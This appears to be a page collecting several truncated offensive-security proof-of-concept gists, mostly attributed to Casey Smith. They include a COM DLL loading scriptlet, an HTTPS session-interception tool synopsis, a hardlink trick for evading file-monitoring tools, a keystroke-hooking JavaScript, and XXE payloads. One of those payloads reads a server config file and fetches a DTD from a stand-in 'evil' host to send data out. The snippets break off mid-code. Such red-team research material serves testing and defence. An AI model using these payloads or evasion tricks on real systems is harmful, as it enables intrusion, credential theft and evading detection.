| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="PoC" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <!-- Proof Of Concept - Casey Smith @subTee --> | |
| <!-- License: BSD3-Clause --> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| #Doesn't Even Have to Be A Conformant COM DLL To trigger the load. | |
| # Sample DLL To inject here | |
| # https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179 | |
| $manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="LiterallyDoesentMatter" version="6.6.6.0"/> <file name="Anyname.dll.anything"> <comClass description="Any Description HERE" clsid="{89565276-A714-4a43-91FE-EDACDCC0FFEE}" threadingModel="Both" progid="JustMakeSomethingUp"/> </file> </assembly>'; | |
| $ax = new-object -Com "Microsoft.Windows.ActCtx" | |
| $ax.ManifestText = $manifest; | |
| $DWX = $ax.CreateObject("JustMakeSomethingUp"); |
| using System; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
| <# | |
| .SYNOPSIS | |
| This script demonstrates the ability to capture and tamper with Web sessions. | |
| For secure sessions, this is done by dynamically writing certificates to match the requested domain. | |
| This is only proof-of-concept, and should be used cautiously, to demonstrate the effects of such an attack. | |
| This script requires local administrative privileges to execute properly. | |
| Function: Interceptor | |
| Author: Casey Smith, Twitter: @subTee |
mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll
This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.
xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| public class TestClass | |
| { | |
| public TestClass() | |
| {} |
| #!/usr/bin/env python | |
| # coding=utf-8 | |
| import argparse | |
| import datetime | |
| import sys | |
| import time | |
| import threading | |
| import traceback | |
| import socketserver |
| // Copyright John Leitch 2010 john.leitch5@gmail.com | |
| var destination = null; | |
| var useClone = false; | |
| var cloneSource = null; | |
| var cloneDelay = 1000; | |
| function hookInputs() { | |
| var frame = document.getElementById('overlayFrame'); | |
| var keyPressScript = |
| Payload: | |
| <?xml version="1.0" encoding="utf-8"?> | |
| <!DOCTYPE root [ | |
| <!ENTITY % start "<![CDATA["> | |
| <!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml "> | |
| <!ENTITY % end "]]>"> | |
| <!ENTITY % dtd SYSTEM "http://evil/evil.xml"> | |
| %dtd; | |
| ]> |
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |